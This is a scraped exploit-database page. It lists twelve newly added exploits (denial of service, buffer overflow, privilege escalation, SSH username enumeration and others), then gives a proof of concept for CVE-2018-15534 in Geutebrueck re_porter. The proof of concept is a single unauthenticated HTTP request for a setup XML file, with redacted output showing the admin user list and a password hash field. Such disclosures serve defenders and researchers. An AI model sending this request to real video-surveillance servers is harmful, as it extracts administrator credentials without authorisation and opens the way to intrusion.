b81a1d9d72
12 changes to exploits/shellcodes Textpad 7.6.4 - Denial Of Service (PoC) UltraISO 9.7.1.3519 - Denial Of Service (PoC) Easyboot 6.6.0 - Denial Of Service (PoC) Softdisk 3.0.3 - Denial Of Service (PoC) Soroush IM Desktop App 0.17.0 - Authentication Bypass Project64 2.3.2 - Buffer Overflow (SEH) Ghostscript - Multiple Vulnerabilities Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation OpenSSH 2.3 < 7.4 - Username Enumeration (PoC) OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) Geutebrueck re_porter 7.8.974.20 - Credential Disclosure ZyXEL VMG3312-B10B - Cross-Site Scripting KingMedia 4.1 - Remote Code Execution Geutebrueck re_porter 16 - Cross-Site Scripting
24 lines
No EOL
883 B
Text
24 lines
No EOL
883 B
Text
# Exploit Title: Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
|
|
# Date: 2018-08-03
|
|
# Exploit Author: Kamil Suska
|
|
# Vendor: https://www.geutebrueck.com/en_US.html
|
|
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
|
|
# Version: prior 7.8.974.20
|
|
# CVE-2018-15534
|
|
|
|
# PoC
|
|
|
|
GET /statistics/gscsetup.xml HTTP/1.1
|
|
Host: example.com:12003
|
|
|
|
# Result (Redacted):
|
|
|
|
<Node Name="UserList" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
|
|
<Node Name="0000" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
|
|
<Value Name="Name" ValueType="ntWideString" Value="Sysadmin"/>
|
|
<Value Name="Password" ValueType="ntString"
|
|
Value="##MD5passwordhash##"/>
|
|
<Value Name="UserRights" ValueType="ntInt32" Value="0x00000001"/>
|
|
<Node Name="SecondUserList"
|
|
NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
|
|
</Node> |